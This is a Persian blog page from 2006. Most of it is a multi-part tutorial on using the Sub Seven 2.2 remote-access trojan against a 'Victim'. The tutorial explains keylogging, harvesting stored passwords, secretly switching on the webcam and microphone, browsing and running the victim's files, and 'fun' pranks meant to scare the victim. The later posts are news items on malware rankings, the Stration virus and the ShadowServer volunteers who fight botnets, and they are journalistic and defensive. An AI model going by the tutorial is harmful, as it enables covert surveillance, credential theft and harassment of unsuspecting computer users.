گزينه open keylogger را انتخاب كرد پنجره اي بنام key logger ظاهر مي شود . در قسمت enable / key loger كه آيكون يك دست دارد ، ليست تمام قسمت هائي كه Victim در حال تايپ دارد را مشاهده كرد .
__________________
آموزش Sub Seven 2.2 (قسمت پنجم)

هائي از fun كردن ، يعني شوخي كردن با Victim :
در قسمت disable keys شما مي توانيد كليدهائي از key bord كامپيوتر Victim انتخاب كرد و آن ها را غير فعال كرد كه اين عمل به نوع خود یکجور دستور fun حساب مي شود يعني شوخي با Victim .
در قسمت replace keys شما مي توانيد جاي دو كليد از key board كامپيوتر Victim را عوض كرد .
در قسمت clear keys شما مي توانيد صفحه اي كه قسمت هاي مختلف تايپ شده است را پاك كنيد و يا اينكه مثلا اگر Victim در Chat yahoo messenger مي باشد مي توانيد pm ها يا off هائي را كه براي طرف مقابلش مي فرست را پاك كنيد تا نوشته ای به طرف مقابل send نشود .
گزينه open logged key : با انتخاب اين گزينه ، پنجره اي بنام logged keys ظاهر مي شود . در قسمت get log keyss شما مي توانيد ليست تمامي كليدهاي فشرده شده ، حتي در زماني كه Victim به اينترنت متصل نبوده و يا لحظه اي كه به اينترنت وصل هست يا بوده را براي شما پخش مي كند و شما با زدن كليد logged keys to a txt file save all مي توانید تمامی آنها را در هارد دیسک خویش ذخیره نمائید .
با زدن كليد delet all loged keys شما مي توانيد تمامي ليست كليدهاي فشرده شده را پاك كنيد .
در قسمت matrix شما مي توانيد به صورتي نمونه اي كه در پنجره matrix opening text : داده شده است نوشته اي تايپ كرده و باز زدن كليد start matrix براي Victim بفرستيد . و از قسمت font color: مي توانيد رنگ نوشته اتان را تغيير دهيد .
از قسمت background color : مي توانيد صفحه اي كه در آن تايپ مي كنيد ، رنگش را تغيير دهيد . با انتخاب گزينه msg manager يك پنجره اي بنام message manager ظاهر مي شود كه مي توانيد به مانند گزينه اي كه در طراحي Server پيغامي جعلي ويرايش مي كرديد ، حال به همان صورت يك پيغام جعلي ويرايش كنيد كه روي صفحه مانيتور Victim هر چند باري كه شما برايش Send كنيد ظاهر شود و حتي اين پيغام ها مي تواند از error هاي مختلف و جعلي تشكيل يابد تا اخطارها و حتي پرسش هائي كه از داخل خوده سيستم عامل ويندوز ميشود و … .
حال وقتي كه پيغام جعلي خود را ويرايش كرديد ابتدا يك بار كليد test message را فشار مي دهيد تا براي شما آن متن پيغام جعلي را نمايش دهد بعد وقتي كه مورد تاييد شما بود كليد send message را فشار مي دهيد تا بفرستد .
گزينه spy manager : با انتخاب اين گزينه شما Server را مجبور به جاسوسي مي كنيد كه ليست تمام ارتباطات معروف گفتگو اينترنتي مانند aol . icq , msn , yahoo messenger را براي شما ارسال كند . كه با فشردن اين گزينه پنجره اي بنام spies ظاهر مي شود كه در آن گزينه هاي گفتگو اينترنتي فعال است و شما با انتخاب كردن هر يك مي توانيد به اطلاعاتي كه درآنها رد و بدل مي شود دست يابيد .
گزینه advance : روي گزينه find files رفته كليك كنيد دو قسمت رو ملاحظه مي كنيد . قسمت find files را كليك كرده كه پنجره اي به همين عنوان ظاهر مي شود و شما در آن مي توانيد تمامي فايلهاي مورد نظر خورد را با هر پسوندي در قسمت find what : وارد كرده و در قسمت where : محلي را كه بايد Server جستجو كند را انتخاب مي كنيد و در قسمت مربوطه وارد مي كنيد و سپس كليد search را در پائين فشار مي دهيد تا به Server دستور دهيد تمامي فايلهاي مدنظر را در مسيري كه انتخاب كرده ايد جستجو كند و در قسمت show found files نتيجه را به شما اعلام دارد

آموزش Sub Seven 2.2 (قسمت ششم)
گزينه password : در اين گزينه قسمت هاي ذيل وجود دارد .
screen saver : با انتخاب اين گزينه ليست Password هاي قسمت screen ( مخفي ) Victim را پيدا مي كند .
ras password : با انتخاب اين گزينه ليست تمامي شماره تلفن و حتي شماره موبايل و همچنين Password هاي اينترنتي ذخيره شده موجود در کامپیوتر Victim را به شما ارسال مي كند .
aim passwoed : با انتخاب اين گزينه ليست حسابهاي aol را براي شما ارسال مي كند .
گزينه mis cellanous : اين گزينه داراي پنج قسمت مي باشد :
قسمت file manager : با انتخاب اين گزينه مي توان كارهاي مختلفي روي hard disk كامپيوتر Victim بدون اينكه شخص هك شونده متوجه شود انجام داد . بدين ترتيب كه با انتخاب درايو مدنظر از كامپيوتر Victim و با استفاده از Icon هاي و در اصل انتخاب هائي كه در سمت راست صفحه داده شده است كارهائي از قبيل : دانلود كردن فايل ، پاك كردن فايل ، refresh كردن مسيرهاي جاري و همينطور پوشه ها ، شاخه ها ، ريشه ها و همچنين درايوهاي داخل hard disk ، run كردن فايل ها ، ساختن شاخه ها و پوشه هاي جديد در مسيرهاي مختلف ، فعال كردن فايلهاي صوتي با پسوند wav ، عوض كردن wallpaper صفحه دكستاپ ، تغيير دادن نام فايل ها ، جستجو كردن فايل ها و همچنين ديدن تصاوير هارد دیسک Victim انجام داد .
گزينه fun manager : كه داراي نه انتخاب است :
قسمت screen capture : با انتخاب اين گزينه پنجره اي بنام screen capture - disabled ظاهر مي شود كه شما مي توانيد تصويري را كه Victimدر حال مشاهده است را مشاهده نموده و براي شروع كار كافيست روي گزينه اي كه آيكون عينك دارد بنام enable / disable screen capture رفته و اجرا كنيد . در همين پنجره اي كه باز شده گزينه بنام full screen capture با آيكون يك ماينتور وجود دارد و شما با انتخاب اين گزينه تمام صفحه ويندوز طرف مقابل را مي توانيد مشاهده كنيد .
گزينه web cam : با انتخاب اين گزينه شما مي توانيد به صورت مخفي و بدون اينكه شخص مقابل متوجه شود دوربين ديجيتالي وي را فعال كنيد .
گزينه flip screen : با انتخاب اين گزينه شما مي توانيد صفحه مانيتور Victim را با سه حالتي كه در اختيار شما مي گذارد تغيير دهيد
flip screen horizontally : با انتخاب اين قسمت شما مي توانيد صفحه مانيتور Victim را افقي نمائيد .
flip screen vertically : بانتخاب اين قسمت شما مي توانيد صفحه مانيتور Victim را عمودي نمائيد .
flip screen both vertically and horizontally : با انتخاب اين قسمت مي توانيد صفحه انيتور Victim را ابتدا افقي و سپس عمودي نمائيد .
گزينهmanager print : با انتخاب اين گزينه پنجره اي بنام print در سمت راست ظاهر مي شود و شما مي توانيد متني مورد دلخواه را در كادري كه وجود دارد تايپ كنيد و سپس با كليدهاي فعال تغيير font متن تايپي خود را ويرايش داده و با زدن كليد print متن مورد نظر را بوسيله چاپگر Victim چاپ نمائيد كه اين عمل به نوع خود باعث حيرت شخص هك شده مي شود و در اصل نوعي عمليات fun حساب مي شود .
گزينه open browser : با انتخاب اين گزينه مي توان سايت اينترنتي دلخواهي را در كامپيوتر Victim باز كرد ، بدينصورت كه در قسمت url : نام سايت مورد دلخواه را تايپ كرده و سپس كليد open browser را فشار مي دهيد .
گزينه windows color : اين گزينه شخص هك شده را به حيرتي چند برابر وا مي دارد . در حقيقت شما با اين گزينه مي توانيد رنگ هاي موجود در ويندوز را به دلخواه خود تغيير دهيد ، به اين ترتيب كه شما با انتخاب اين گزينه در سمت راست سه انتخاب با عنوانين ذيل داريد
[menu color start menu , other menus] : با كليك كردن پنجره colorحاوي رنگ ها باز مي شود كه شما با انتخاب رنگهاي مورد دلخواه مي توانيد رنگ منوهاي داخلي سيستم عامل ويندوز را تغيير دهيد .
[3d face color task bar , buttons] : با كليك كردن پنجره color حاوي رنگ ها باز مي شود كه شما با انتخاب رنگهاي مورد دلخواه مي توانيد رنگ task bar ها و همچنين تكمه هاي موجود را تغيير دهيد .
[ widow color widow background] : با كليك كردن پنجره colorحاوي رنگ ها باز مي شود كه شما با انتخاب رنگهاي مورد دلخواه مي توانيد رنگ زمينه پنجره هاي موجود را تغيير دهيد .
گزينه Realistic matrix : اين گزينه مانند همان قسمت matrix مي باشد ، با اين تفاوت كه محيط ايجاد شده در اين قسمت بسيار كاملتر از گزينه matrix مي باشد.

آموزش Sub Seven 2.2 (قسمت هفتم)آخر
گزينه fun other : داراي هفت انتخاب مي باشد :
restart computer : با انتخاب اين گزينه در سمت راست پنج انتخاب به شما داده مي شود .
shutdown computer : با اين انتخاب شما مي توانيد كامپيوتر Victim را shutdown نمائيد .
power off computer : با اين انتخاب شما مي توانيد برق را خاموش كرده تا به كامپيوتر Victim نرسد .
reboot : با اين انتخاب مي توانيد کامپیوتر Victim را از نو بوت كنيد و ... .
mouse : با انتخاب اين گزينه شما مي توانيد تمام عمليات ماووس را در اختيار كامل خود درآوريد ، در سمت راست شش انتخاب به شما پيشنهاد مي شود از جمله :
revers mouse button : تغيير دادن لبه تكمه هاي ماووس يعني كليك راست و كليك چپ .
restore mouse button : به حالت درآوردن تكمه هاي ماووس .
hide mouse : پنهان كردن نشان گر ماووس در صفحه كامپيوتر Victim .
show mouse : ظاهر كردن نشان گر ماووس در صفحه كامپيوتر Victim .
control mouse : به كنترل درآوردن كامل ماووس و در اختيار گرفتن تمام عمليات اجرائي ماووس .
stop controlling : متوقف كردن كنترل كامل ماووس از طرف شما و همچنين از گزينه mouse trails مي توانيد نشانگر ماووس را دنباله دار كنيد .
گزينه volume settings : با انتخاب اين گزينه مي توانيد به اسپيكرهاي Victim ولم داده و صدا را كم و زياد كنيد .
گزينه record mic : با انتخاب اين گزينه مي توانيد ميكروفن Victimرو فعال كنيد و صداي طرف مقابل رو ضبط كنيد .
گزينه time / date : با انتخاب اين گزينه مي توانيد ساعت و تاريخ كامپيوتر Victim رو بدلخواه تغيير دهيد .
گزينه extra fun : كه يكي از مهمترين عمليات fun حساب مي شود ، شما با انتخاب اين گزينه و چهارده پيشنهادي كه در سمت راست به شما مي شود كاملا طرف هك شده را به حيرت واداريد و حتي باعث ترس و وحشت وي شويد .
با انتخاب كليد hide desktop icons : تمامي آيكون هاي موجود در دكستاپ را مي توانيد محو نمائيد .
با انتخاب كليد show desktop icons : تمامي آيكون هاي موجود محو شده بوسيله شما در دكستاپ را مي توانيد دوباره نمايان و ظاهر نمائيد .
با انتخاب كليد hide statr button : شما مي توانيد دكمه استارت منوي ويندوز را پنهان نمائيد .
با انتخاب كليد show start button : شما مي توانيد دكمه پنهان شده استارت منوي ويندوز بوسيله شما را دوباره نمايان و ظاهر نمائيد .
با انتخاب كيد open CD-ROM : شما مي توانيد درب CD-ROM را پس از پانزده ثانيه مكث Eject نمائيد .
با انتخاب كليد close CD-ROM : شما مي توانید درب Eject شده CD-ROM را ببندید .
با انتخاب كليد hide clock : شما مي توانيد ساعت سيستم Victimرا ناپديد كنيد ،‌ پنهان كنيد .
با انتخاب كليد show clock : شما مي توانيد ساعت سيستم Victim را كه ناپديد كرده ايد رو باز نمايان سازيد .
با انتخاب كليد start speaker : شما می توانید اسپیکرهای Victim را روشن کنید .
با انتخاب كيلد stop speaker : شما مي توانید عملیات اسپیکرهای Victim را متوقف سازید .
با انتخاب كليد hide taskbar : شما مي توانيد taksbar هاي Victim را ناپديد ،‌ پنهان كنيد .
با انتخاب كليد show taskbar : شما مي توانيد taskbar هاي ناپديد شده Victim از جانب شما را نمايان سازيد .
با انتخاب كليد turn monitor off : شما مي توانيد برق ورودي به مانيتور Victim را خاموش نمائيد .
با انتخاب كليد turn monitor on : شما مي توانيد برق ورودي به مانيتور Victim را كه خاموش كرده ايد را روشن نمائيد .
گزينه keys fun : كه داراي هشت انتخاب در سمت راست هست و مربوط به fun با كي بورد Victim مي باشد .
با انتخاب كليد Num loack off : شما مي توانيد اين كليد از كي بورد Victim را خاموش نمائيد .
با انتخاب كليد Num loack on : شما مي توانيد كليد خاموش شده مذكور را دوباره روشن نمائيد .
با انتخاب كليد Caps loack off : شما مي توانيد اين كليد از كي بورد Victim را خاموش نمائيد .
با انتخاب كليد Caps loack on : شما مي توانيد كليد خاموش شده مذكور را دوباره روشن نمائيد .
با انتخاب كليد Scroll loack off : شما مي توانيد اين كليد از كي بورد Victim را خاموش نمائيد .
با انتخاب كليد Scroll loack on : شما مي توانيد كليد خاموش شده مذكور را دوباره روشن نمائيد .
با انتخاب كليد enable CtrlAltDel : شما مي توانيد سه كليد جهت restart كردن ويندوز را فعال نمائيد .
با انتخاب كليد disable CtrlAltDel : شما مي توانيد سه كليد مذكوري را كه فعال كرده ايد را غير فعال نمائيد .
توجه : با تمامي اين تفاصير شما مي توانيد fun هاي مختلفي انجام دهيد كه باعث وحشت Victim شود ... .
آخرين گزينه :
گزينه local option : كه دو شاخه اصلي دارد و اولين شاخه داراي پنج گزينه مجزا مي باشد كه مهمترين آنها prefernce خ مي باشد كه تنظيمات اصلي Client توسط اين قسمت انجام مي شود . تنظيمات پيش فرض بسيار مناسب مي باشد با اين حال اين امكان براي شما فراهم مي شود كه تنظيمات خود را بر روي Client انجام دهيد كه توصيه مي شود تغييري در تنظيمات Client انجام ندهيد و بگذاريد با تنظيمات پيش فرض اوليه عمليات را انجام دهد . شما از گزينه هاي شاخه local option مي توانيد به Server خود يك سري proxi هائي تعريف كنيد كه براي اينترنت اكسپلورر Victim مشكلاتي ايجاد كند ، همچنين مي توانيد دوباره ويرايش plugin ها را داشته باشيد .
دومين شاخه advanced است كه توضيحاتي در مورد commands به شما مي دهد و …..
-------
__________________
نوشته شده توسط هومن (مدیر وبلاگ) در چهارشنبه 1385/09/15 ساعت 13:51 | لینک ثابت |
فهرست شايع ترين و مهمترين ويروس‌‏ها و كدهاي مخرب رديابي شده در ماه گذشته ميلادي منتشر شد.



شركت امنيتي PANDA SOFTWARE، طي گزارشي علاوه بر انتشار اين فهرست، اعلام كرد كه حضور كدهاي مخرب كشف شده براي اولين بار، در فهرست شايع‌‏ترين بدافزارهاي ماه نوامبر، قابل توجه و چشم‌‏گير بوده است.

براي نمونه، كرم رايانه‌‏اي W32/NUWAR كه يك كد بسيار جديد است و براي اولين بار رديابي شده، در مكان چهارمين كد مخرب شايع در جهان،‌ قرار گرفته است. اين كرم از طريق نامه‌‏هاي الكترونيك با موضوع "جنگ جهاني سوم" و يا اخباري از مرگ احتمالي "جرج بوش" و يا "ولادمير پوتين"، منتشر مي‌‏شود.

يك حضور جديد ديگر در فهرست شايع‌‏ترين كدهاي مخرب، به BANBRA.DJM، تعلق دارد كه عضوي از خانواده بزرگ تروژان‌‏هايي كه براي سرقت اطلاعات شخصي و محرمانه كاربران خدمات آنلاين بانك‌‏هاي كشور برزيل طراحي شده‌‏اند.
نمونه جديد ديگري كه مكان دهم فهرست را به خود اختصاص داده، يك تروژان با عنوان SPAMER.T است. كد مخربي براي ورود مخفيانه به رايانه‌‏ها و تبديل آنها به يك پايگاه قدرتمند براي ارسال هرزنامه به رايانه‌‏هاي ديگر كه از روي نمونه‌‏هاي قديمي تر طراحي شده است.

در بين كدهاي مخرب قديمي‌‏تر كه مدت‌‏ها است به عنوان شايع‌‏ترين كدها شناخته مي‌‏شوند، SDBOT.FTP، مانند ماه ميلادي گذشته، مهم‌‏ترين و شايع‌‏ترين ويروس رديابي شده در جهان است.
اين كد توسط گونه‌‏هاي موجود در خانواده كرم رايانه‌‏اي SDBOT و براي دانلود آنها از طريق FTP، مورد استفاده قرار مي‌‏گيرد.

اين كد مخرب با اين كه از ابتداي سال 2006 تا كنون هم چنان صدر نشين فهرست مهم‌‏ترين و مخرب‌‏ترين ويروس‌‏ها بوده، اما از تعداد رايانه‌‏هاي مورد حمله آن در ماه نوامبر تا حدودي كاسته شده است.
A مجدداً خود را به عنوان دومين بدافزار شايع ، معرفي نموده است. اين تروژان كه در ماه اكتبر با سرعت خيره‌‏كننده‌‏اي خود را به عنوان يك بدافزار خطرناك و شايع در فهرست ماهانه پاندا قرار داد، در ماه نوامبر نيز در حدود 1.5 درصد حمله‌‏هاي رايانه‌‏اي جهان را به خود اختصاص داده است.

تروژان ABWIZ.A نيز هم چنان در مكان سوم فهرست نوامبر قرار دارد. اين كد مخرب براي سرقت رمزهاي عبور موجود در رايانه‌‏ها طراحي شده است.

NETSKY.P، كرم رايانه‌‏اي بسيار قديمي كه براي حمله‌‏هاي خود از يك نقطه آسيب پذير مشهور در برنامه INTERNET EXPLORER استفاده مي‌‏كند، با چند پله نزول در جايگاه نهم فهرست قرار گرفته است. كاهش نسبي در فعاليت‌‏هاي تخريبي NETSKY.P و SDBOT.FTP كه هر دو از حفره‌‏هاي امنيتي و نقاط آسيب پذير براي حمله‌‏هاي مخرب استفاده مي‌‏كنند، مي‌‏تواند نشانه‌‏اي از افزايش بروزرساني برنامه‌‏هاي مختلف توسط كاربران رايانه‌‏اي و در نتيجه ترميم حفره‌‏هاي امنيتي باشد.
كاربران رايانه براي اطمينان از امن بودن و در معرض خطرقرار نداشتن سيستم‌‏هاي خود، مي‌‏توانند از برنامه قدرتمند و رايگان ACTIVSCANبراي بررسي و ويروس يابي رايانه هايشان استفاده كنند. اين برنامه قادر است حتي كدهاي مخرب ناشناخته و بسيار جديد را كه به طور مخفيانه در سيستم حضور دارند، رديابي و كشف نمايد.

__________________
ویروس استريشن
رفتار عجيب يك ويروس اينترنتي به نام "استريشن"(‪ (Stration‬يا "وارزوف"(‪ ،(Warezof‬كارشناسان امنيت اينترنتي و شركتهاي توليدكننده نرم‌افزارهاي ضد ويروس را به شگفتي واداشته است.

به گزارش بخش خبر شبكه فن آوري اطلاعات ايران، از ایرنا، اين ويروس ابتدا توسط ايميلهاي تبليغاتي موسوم به "اسپم" وارد صندوق ايميل كاربران مي‌شود و پس از آلوده كردن هر رايانه كه معمولا با كليك كردن و گشودن اين ايميل توسط كاربر رخ مي‌دهد، ويروس يك نسخه از خود را به تمامي آدرسهاي ايميل موجود در رايانه ارسال مي‌كند.

اما ويژگي كه سبب شگفتي كارشناسان شركتهاي سازنده نرم‌افزارهاي ضد ويروس شده، به روز شدن كد نرم‌افزاري اين ويروس در هر ‪ ۳۰‬دقيقه است به طوري كه ويروس "استريشن" هر ‪ ۳۰‬دقيقه نگارش جديدتري از خود را از ميان مجموعه‌اي از وب سايتهاي اينترنت دانلود و در رايانه آلوده نصب مي‌كند.

به گفته "ميكو هايپونن" كارشناس شركت توليدكننده نرم‌افزارهاي ضد ويروس "اف-سكيور" در فنلاند، در گذشته ويروسهايي شناسايي شده بودند كه قادر بودند كد نرم‌افزاري خود را تغيير بدهند اما آن ويروسها به راحتي توسط نرم‌افزارهاي ضد ويروس شناسايي و متوقف مي‌شدند و اين درحالي است كه ويروس "استريشن" توسط نگارندگان خود و با روشي ناشناخته هر ‪ ۳۰‬دقيقه به روز مي‌شود و به همين علت نرم‌افزارهاي ضد ويروس براي شناسايي آن دچار مشكل شده‌اند.

به طور مثال شركت "اف-سكيور" تاكنون ‪ ۱۵۰‬بار نرم‌افزار ضدويروس خود را براي شناسايي "استريشن" به روز كرده و شركت امنيتي "سوفوس" نيز ‪ ۳۰۰‬نگارش از اين ويروس را شناسايي كرده است.

نكته عجيب ديگر در مورد ويروس "استريشن" اين است كه اين ويروس در ظاهر هيچ عمل خاصي در رايانه‌هاي آلوده شده انجام نمي‌دهد. تخمينهاي شركتهاي امنيتي نشان مي‌دهد "استريشن" تاكنون چند صد هزار رايانه را در جهان آلوده كرده و نگارنده ويروس احتمالا منتظر است تا پس از آلوده كردن تعداد خاصي رايانه، از آنها براي هدفي خاص مانند ارسال انبوه ايميلهاي تبليغاتي و يا راه‌اندازي حملات اينترنتي بر عليه وب سايتها استفاده كند.

آمار جمع‌آوري شده توسط شركت "سوفوس" نشان مي‌دهند ويروس "استريشن" جزو ده ويروس شايع در ماه اكتبر بوده است. بر اساس همين آمار، ويروس "نت‌اسكاي‌پي" و "ماي‌تاب.اي‌اس" شايعترين ويروسهاي ماه اكتبر بوده‌اند
__________________
قربانی خاموش یک هکر
داوطلبان آنلا‌ين براي نجات قربانيان خاموش هكرها كه در Botnetها به دام افتاده‌اند، تلا‌ش مي‌كنند. اولين تلاش‌هاي نيكولاس آلبرايت براي راه يافتن به تاريكخانه‌‌هاي اينترنتي، به نوامبر سال 2004، يعني كمي پس از درگذشت پدرش برمي‌گردد. تنها يك ماه از مرگ پدرش مي‌گذشت كه آلبرايت متوجه شد گروهي از خرابكاران اينترنتي به كامپيوتر پدرش نفوذ كرد‌ه‌اند و براي آن به عنوان بخشي از شبكه بزرگ و جهاني خود، براي كپي غيرقانوني نرم‌افزار و فيلم‌‌ها برنامه‌ريزي نمود‌ه‌اند.‌ آلبرايت با تماس با مركزي كه سرويس اينترنت را از آن‌ها مي‌گرفت و خرابكاران كنترلش را به دست گرفته بودند، شبكه آن‌ها را بر هم زد. از آن به بعد، آلبرايت خشم فروخورده خود از مرگ پدرش را صرف تشكيل گروهي به نام ShadowServer كرد كه وظيفه‌اش مبارزه با گروه‌هاي بزرگ خرابكاري به نام است كه با هك‌كردن‌ پي‌سي‌ها، كنترل آن‌ها را از راه دور به دست مي‌گيرند.


آلبرايت 27 ساله در كنار همسر و دو فرزندش كه در يك مركز سلامت و بهداشت در كلورادو به عنوان مبلغ فعاليت مي‌كنند، زندگي مي‌كند و در اوقات فراغت خود با اعضاي ShadowServer چت مي‌‌كند و به تبادل اطلاعات درباره دزدان فعال اينترنتي مي‌پردازد. هر <‌bot> يك كامپيوتر است كه با نصب نرم‌افزار‌هاي ويژ‌ه‌اي توسط هكر‌ها، براي انجام‌دادن عمليات مورد نظر تحت كنترل درآمده است. هكر‌ها از اين ‌botها براي طرح‌هاي آنلا‌ين خود نظير مرور و بررسي اطلاعات شخصي و مالي كاربر نيز استفاده مي‌كنند.

او اخيراً در مصاحبه‌اي گفت: <من لپ‌تاپم را هميشه با خود به همراه دارم و حتي زماني كه در منزل نيستم، به دقت بوت‌نت‌ها را زير نظر مي‌گيرم. گاهي روزانه تا شانزده ساعت از وقت خود را صرف روزآمد نگهداشتن اطلاعات خود درباره آن‌ها مي‌كنم.>

بعدازظهر يكي از يكشنبه‌هاي ماه فوريه، آلبرايت به طور مخفيانه مشغول گشت‌زني در يك كانال آنلا‌ين بود كه متوجه شد صاحب يك بوت‌نت كه كنترل 1400 كامپيوتر با سيستم عامل ويندوز را به دست گرفته در حال نصب برنامه‌ keylogger (براي ثبت ضرب كليدهاي كاربران) است. اين برنامه تمام اطلاعات تايپي قرباني خود را روي صفحات login يا ديگر فرم‌هاي ورودي داده، در جايي ثبت مي‌كرد.

آلبرايت قبلاً يك نسخه از اين نوع كرم‌هاي كامپيوتري را كه هكر‌ها از آن براي به دست گرفتن كنترل كامپيوتر استفاده مي‌كردند، تجزيه و تحليل كرده بود. اين كرم، نام كاربر و كلمه ورودي مورد نياز براي كنترل كانال آنلا‌ين را در اختيار وي قرار مي‌داد. آلبرايت با معرفي خود به عنوان يكي از بوت‌ها، نحوه كار هكر را زير نظر گرفت تا اطلاعات لازم را براي متوقف كردن كانال دزديده شده از سرويس‌دهنده اينترنتي به دست آورد.

او كامپيوتر آلود‌ه‌اي را كه اطلاعات فعاليت‌هاي اينترنتي كاربر غافل خود را گزارش مي‌داد، زير نظر گرفت و از ماهيت اين داده‌‌ها دريافت كه اين كامپيوتر متعلق به فيزيكداني در ميشيگان است.‌آلبرايت مي‌گويد: <مي‌ديدم آن سارق ‌keylogger را روي كامپيوتر اجرا مي‌كند و داده‌‌ها را به سرقت مي‌برد. اما اين نفوذ مخالف قوانين امنيت اجتماعي است و آن فيزيكدان نيز لازم بود براي حفظ و نگهداري اطلاعاتش ترتيبات امنيتي را بيشتر به كار مي‌برد. از اين رولازم بود پليس در جريان قرار گيرد و ماشين را از شبكه خارج كند.>

يك ساعت بعد و با چند تماس تلفني، كامپيوتر آن دكتر از شبكه خارج شد و موضوع نيز به اطلاع وي رسيد. آلبرايت هم نامه الكترونيكي حاوي اطلاعات لازم درباره اين حمله اينترنتي را در اختيار ‌FBI قرار داد. هر چند هيچ اميدي نداشت كه آن‌ها به آن ترتيب اثر دهند. وي خود مي‌داند كه اين اطلاعات در صورتي مفيد واقع خواهد شد كه در اين باره تحقيقي صورت گيرد و اميدوار است حداقل اين اطلاعات در جايي بايگاني شده باشد.

تجارت غيرقانوني

شبكه bot ابزار تجارت‌هاي مجرمانه روي اينترنت هستند. آن‌ها به هكر‌ها اجازه مي‌دهند به صورت ناشناس به تجارت بپردازند، كرم ارسال كنند، به ازاي دريافت پول از شركت‌ها آگهي‌هاي ناخواسته‌اي روي كامپيوتر‌ها بفرستند و يا آن‌ها را مبدا داد و ستد‌هاي مالي و بانكي غير قانوني قرار دهند.

همچنان كه منافع ايجاد بوت‌نت بيشتر مي‌شود، به تعداد كامپيوتر‌هاي آلوده نيز اضافه مي‌شود. ديويد داگون، دانشجوي دكترا كه سال‌ها وقت خود را صرف جمع‌آوري اطلاعات درباره گسترش جهاني اين نوع شبكه‌‌ها كرده است، تخمين مي‌زند كه در سيزده‌ماه آخر منتهي به ژانويه، بيش از سيزده ميليون ‌پي‌سي در سراسر دنيا به كد‌هاي ناشناخته‌اي آلوده شد‌ه‌اند كه آن‌ها را به ‌bot تبديل نموده است.

بوت‌نت معمولاً متشكل از كامپيوتر‌هايي با سيستم‌عامل ويندوز است كه متعلق به شركت‌هاي كوچك تجاري يا افرادي هستند كه نتوانسته‌اند خود را در برابر نفوذ هكر‌ها يا ويروس‌ها ايمن نمايند. منشأ آلودگي اين كامپيوتر‌ها معمولاً نامه‌‌هاي الكترونيكيِ داراي پيوست آلوده هستند. البته ديواره‌‌هاي آتش و برنامه‌‌هاي ضد ويروس مي‌توانند سدي در برابر اين گونه خطرات باشند، اما اين خرابكاران به شدت در حال توسعه برنامه‌‌هايي هستند كه آن‌ها را از چشم اين برنامه‌هاي محافظ مخفي نگه مي‌دارد.

آندره دو مينو، مشاور يك شركت خصوصي در بخش فناوري، مي‌گويد: <نحوه كار shadowserver براي من جالب بود.> او بعد از آن كه كار سابقش را به عنوان رئيس بخش انفورماتيك يك شركت خدماتي تجاري ر‌ها كرد، به طور اتفاقي با اين گروه آشنا شد. او مي‌گويد: <بسياري از كاربران شركت سابقش برنامه‌‌هاي ضدويروس و spyware را برنامه‌‌هايي صد در صد كامل مي‌دانستند كه مي‌تواند از آن‌ها در برابر همه چيز مراقبت كند. اما اكنون مي‌بينم بسياري از مشهورترين آن‌ها قادر نيستند فايل‌هاي مربوط به بوت‌نت‌ها را شناسايي نمايند.>

تله گذاري براي ويروس‌ها

ديويد اندرو كه در سوپر ماركتي در ليورپول كار مي‌كند، در اوقات فراغت خود به بررسي نمونه ويروس‌هاي كامپيوتري مي‌پردازد. اندرو كه از معدود اعضاي غير امريكايي ShadowServer است، همانند اغلب ديگر اعضا، از اوايل دوران جواني به كار با كامپيوتر و برنامه‌نويسي علاقمند بوده است.

چهارماه قبل وي به دنبال تحصيل در رشته كامپيوتر در دانشكده نظامي بريتيش رفت، اما آن‌ها درخواست وي را به دليل مشكلات متعدد جسمي نپذيرفتند. اغلب اعضاي ShadowServer سابقه كار در زمينه امنيت كامپيوتري داشته‌اند و تماماً به صورت داوطلبانه به اين تيم پيوسته‌اند و اغلب، اوقات بيكاري و فراغت خود را صرف كار روي پروژه‌‌هاي گروه مي‌كنند.

ويروس‌هايي كه اندرو روي آن‌ها كار مي‌كند مورد استفاده هكرها براي آلوده كردن كامپيوتر‌ها و تبديل آن‌ها به bot مي‌باشند. ShadowServer شبكه‌‌هاي bot را با به كارگيري مجموعه‌اي از honeynetها شناسايي مي‌كند. ‌honeynetها خود را كامپيوتري معرفي مي‌كنند كه داراي اشكالات امنيتي هستند. به اين ترتيب آن‌ها مي‌توانند مخفيانه هكر‌ها را بشناسند و نمونه ويروس‌هاي مورد استفاده آن‌ها را گردآوري كنند.

اغلب بوت‌نت‌ها با وادار نمودن قربانيان جديد به دانلودكردن برنامه كنترلي هكر از يك وب سايت، خود را گسترش مي‌دهند. با ردگيري و آشكارسازي لينك‌ها، اعضاي ShadowServer مي‌توانند نقشه بوت‌نت‌ها را تشخيص دهند و اطلاعات آن را در اختيار ديگر شكارچيان دزدان اينترنتي، گروه‌هاي امنيتي داوطلب، نيروي‌هاي فدرال و يا ISP ميزبان وب سايت آلوده قرار دهند.

هر قطعه كد ‌bot پس از تجزيه و تحليل، توسط تعداد زيادي از ويروس‌ياب‌هاي مشهور مورد بررسي قرارمي‌گيرد تا مشخص شود آيا اين شركت‌هاي امنيتي به وجود چنين برنامه‌‌هاي ناخواسته و مشكوكي پي برده‌اند يا خير.ShadowServer اين كد‌هاي شناخته‌نشده را به شركت‌هاي بزرگ توليدكننده برنامه‌‌هاي ضدويروس ارجاع مي‌دهد. اندرو مي‌گويد: <براي وي بسيار جاي شگفتي دارد كه چگونه اغلب اين كدها از چشمان ويروس‌ياب‌ها دور مي‌مانند.‌ در بهترين حالت تنها يك يا دو برنامه از اين دست توسط ويروس‌ياب‌ها شكار مي‌شود، ولي صد‌ها برنامه ديگر وجود دارند كه آن‌ها قادر به شناساييشان نيستند.>

تا آنجا كه اندرو دريافته، انگيزه خرابكاران از نگارش اين كد‌ها، جز فروش آن‌ها به ديگر خرابكاران، كسب درآمد چند پني به ازاي هر نصب‌ آنلا‌ين تبليغ‌افزار است. اغلب اين ‌botmasterها برنامه‌‌هاي سخت جاني هستند كه بار‌ها فعال مي‌شوند تا درآمد بيشتري كسب كنند.

خدمت بي مزد

حتي پس از اعلان به ISP آلوده و خارج كردن كانال فرمان و كنترل از دست botmaster، اغلبbot ها همچنان آلوده مي‌مانند و مرتباً براي برقراري تماس با سرور كنترلي هكر سعي مي‌كنند؛ غافل از اين‌كه اين سرور ديگر وجود ندارد. آلبرايت مي‌گويد: <در برخي مواقع آن ‌botmaster براي مدت چند روز يا چند هفته منتظر مي‌ماند تا مجدداً ‌ ‌bot تنها مانده را ثبت‌نام نمايد. از اين رو احتمال بازگشت بوت‌نت‌هايي كه قبلاً از بين برده‌ بوديم وجود دارد.>

